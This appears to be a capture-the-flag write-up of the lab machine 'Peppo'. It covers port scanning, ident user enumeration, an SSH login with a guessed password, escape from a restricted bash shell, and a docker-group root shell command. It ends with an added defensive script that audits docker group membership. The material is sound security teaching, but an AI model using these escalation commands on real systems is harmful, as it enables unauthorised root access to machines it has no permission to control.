# Peppo

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FS3ZMkIR4X3MkruwaXJ4X%2Fimage.png?alt=media&#x26;token=fb76660e-47e7-4af3-ab2b-7695f14c9a68" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running, we can use the Perl script `ident-user-enum` to identify which user each of the listening services is running as.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FA6A5eQfcLRKVIkLFFvsD%2Fimage.png?alt=media&#x26;token=4f1de485-6cc5-401b-8d62-d358fdd3de86" alt=""><figcaption></figcaption></figure>

Port 10000 reports it is running under the user 'Eleanor'. I tried brute-forcing the username on `SSH` and had no luck. Eventually, simply trying `eleanor:elenaor`, I was able to log in on SSH.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FJdvesMhfRctqbYhLQMX7%2Fimage.png?alt=media&#x26;token=3c733af8-7d78-47b6-a62a-3eeb45973b6d" alt=""><figcaption></figcaption></figure>

Running the `id` command shows we are locked in a restricted bash shell. We can check which commands are available to us by viewing what binaries we have access to.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FKwjMZWX0fAeI0cUVkmjW%2Fimage.png?alt=media&#x26;token=03b5a0c6-1b9c-48f0-84a5-aa6145a32124" alt=""><figcaption></figcaption></figure>

Check GTFOBins for whether any of these binaries can spawn a shell and so escape the restricted one:

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2F6n0KoRLnrdbvpGNBP0Hb%2Fimage.png?alt=media&#x26;token=37d215d0-226d-448b-8c8f-0e4e4bf4e602" alt=""><figcaption></figcaption></figure>

After running the above command we can set a new `PATH`, spawn a proper shell with Python, and then set the `PATH` again inside it so we have full use of the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FLAORmFcC7dBcYgMQCmAH%2Fimage.png?alt=media&#x26;token=5ef0ea46-9b47-445d-91ca-e6691d710b6c" alt=""><figcaption></figcaption></figure>

The command `id` shows we are a member of the docker group. GTFOBins again shows a method for spawning a root shell when we are a member of the docker group.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FMyXCcypbNSDWhs1OgKx2%2Fimage.png?alt=media&#x26;token=72684f2f-e2c2-4072-938d-77d40ef43ed0" alt=""><figcaption></figcaption></figure>

First, check what images we have available to us:

```
docker image ls
```

Take the GTFOBins command and replace the `<alpine>` placeholder with one of the images listed above (here `redmine`):

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

This returns a shell as root:

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FiWHkLgpUteaSPyctspc5%2Fimage.png?alt=media&#x26;token=9c04afaf-1639-407f-9501-021aa8a06b46" alt=""><figcaption></figcaption></figure>
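The root cause on this box is an account in the docker group, which is root-equivalent regardless of the restricted login shell. As an added audit example (not part of the original writeup), the script below reads `/etc/passwd` and `/etc/group` content and flags every non-root account that is a docker member, noting where a restricted shell such as `rbash` gives a false sense of containment; the sample files are constructed, not taken from the target.

```python
"""Flag accounts whose docker group membership makes them root-equivalent."""
from dataclasses import dataclass

# Assumption: the restricted shells worth flagging on a Debian-style host.
RESTRICTED_SHELLS = {"/bin/rbash", "/usr/bin/rbash"}

# Constructed sample files modelled on the box layout (not copied from it).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
eleanor:x:1000:1000::/home/eleanor:/bin/rbash
alice:x:1001:999::/home/alice:/bin/bash
bob:x:1002:1002::/home/bob:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
docker:x:999:eleanor,root
users:x:100:
"""


@dataclass(frozen=True)
class Finding:
    user: str
    shell: str
    restricted_shell: bool  # True when rbash-style restriction is in place


def parse_passwd(text):
    """Map login name -> (uid, primary gid, login shell)."""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _, uid, gid, _, _, shell = line.split(":", 6)
            users[name] = (int(uid), int(gid), shell)
    return users


def docker_group(text):
    """Return (gid, explicit members) of the docker group, or (None, set())."""
    for line in text.splitlines():
        if line.startswith("docker:"):
            _, _, gid, members = line.split(":", 3)
            return int(gid), {m for m in members.split(",") if m}
    return None, set()


def audit_docker_group(passwd_text, group_text):
    """Non-root accounts that can reach root through the docker group."""
    gid, members = docker_group(group_text)
    findings = []
    for name, (uid, pgid, shell) in parse_passwd(passwd_text).items():
        if uid == 0 or (name not in members and pgid != gid):
            continue  # root itself, or not a docker member (explicit or primary)
        findings.append(Finding(name, shell, shell in RESTRICTED_SHELLS))
    return sorted(findings, key=lambda f: f.user)
```

Membership through a primary GID (as for `alice` in the sample) is caught as well as explicit membership, which a plain `grep docker /etc/group` misses.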

